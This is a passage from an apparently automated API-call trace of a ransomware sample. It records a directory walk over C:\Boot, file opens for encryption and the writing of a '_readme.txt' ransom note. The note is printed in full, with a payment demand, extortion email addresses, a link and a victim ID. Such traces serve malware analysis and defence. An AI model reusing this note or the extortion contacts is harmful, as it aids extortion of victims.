Size=0x20) returned 0x3b3c638 [0166.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0166.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0166.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0166.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c638 [0166.039] PathFindFileNameW (pszPath="C:\\Boot\\pt-PT\\") returned="pt-PT\\" [0166.039] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0166.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c610 | out: hHeap=0xcd0000) returned 1 [0166.039] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0166.039] PathFindFileNameW (pszPath="") returned="" [0166.039] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0166.039] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0166.039] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0166.039] FreeLibrary (hLibModule=0x759d0000) returned 1 [0166.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c638 | out: hHeap=0xcd0000) returned 1 [0166.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.039] PathAppendW (in: pszPath="C:\\Boot\\pt-PT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 1 [0166.040] PathFileExistsW (pszPath="C:\\Boot\\pt-PT\\_readme.txt") returned 0 [0166.040] lstrcpyW (in: lpString1=0x3b47e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0166.040] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0166.040] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\_readme.txt" (normalized: "c:\\boot\\pt-pt\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0166.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0166.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b47e70 | out: hHeap=0xcd0000) returned 1 [0166.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0166.040] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0166.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.040] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0166.041] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0166.041] PathFindExtensionW (pszPath="C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned=".mui" [0166.041] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0166.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e88 | out: hHeap=0xcd0000) returned 1 [0166.041] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0166.041] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0166.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c908 | out: hHeap=0xcd0000) returned 1 [0166.041] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0166.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c908 [0166.041] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0166.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0166.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0166.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0166.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.043] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.043] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.043] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.043] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.043] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.043] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.043] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.043] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.043] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0166.043] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.043] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.043] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.043] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0166.043] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.043] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.043] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.043] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.043] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.043] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.043] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.043] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.043] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.043] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.043] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.043] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.043] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.043] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.043] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.043] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.044] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.044] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.044] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.044] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.044] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.044] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.044] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.044] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0166.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0166.044] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.044] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.044] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.044] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.044] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0166.044] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0166.045] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0166.045] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.045] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.045] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.045] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.045] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.045] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.045] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c660 [0166.045] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0166.045] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0166.045] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c660 | out: hHeap=0xcd0000) returned 1 [0166.045] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) 